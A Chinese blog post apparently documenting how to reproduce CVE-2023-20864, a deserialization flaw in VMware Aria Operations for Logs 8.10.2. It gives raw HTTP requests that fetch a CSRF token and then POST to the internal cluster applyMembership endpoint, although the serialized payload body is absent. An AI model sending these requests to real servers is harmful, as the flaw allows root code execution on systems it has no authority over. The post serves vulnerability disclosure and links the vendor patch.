VMware Aria Operations for Logs反序列化漏洞(CVE-2023-20864)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!
0x01漏洞介绍
VMware Aria Operations for Logs是美国威睿(VMware)公司的一套集中式日志管理解决方案。该产品支持日志整理和日志分析等功能。
VMware Aria Operations for Logs存在安全漏洞,该漏洞源于存在反序列化漏洞,攻击者利用该漏洞可能能够以root身份执行任意代码。
0x02影响版本
VMware Aria Operations for Logs 8.10.2
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
漏洞复现
GET /csrf HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
X-Csrf-Token: Fetch
Accept-Encoding: gzip, deflate
get方式访问/csrf路径获取cookie信息
POST /api/v2/internal/cluster/applyMembership HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 342
Content-type: application/octet-stream
Cookie: cs=0C0862C68F1DB629F24CDF796748CDFE; JSESSIONID=7B89B2F7EB41A15CF018AB103EAB5ECE
X-CSRF-Token: NjdFRTMwMTdBQTY3OUYwNEQ0OTgyMjA0RjEwQ0E2MDYwMDAwMDE4YzBlZTllODE5TVNeZtMO0LeS9coLvDmd-OwQNzkF7f82hYvvgO2HMzk=
Accept-Encoding: gzip, deflate
’
post方式提交反序化数据
dns解析记录
3.nuclei工具测试(漏洞存在)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.vmware.com/security/advisories/VMSA-2023-0007.html
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果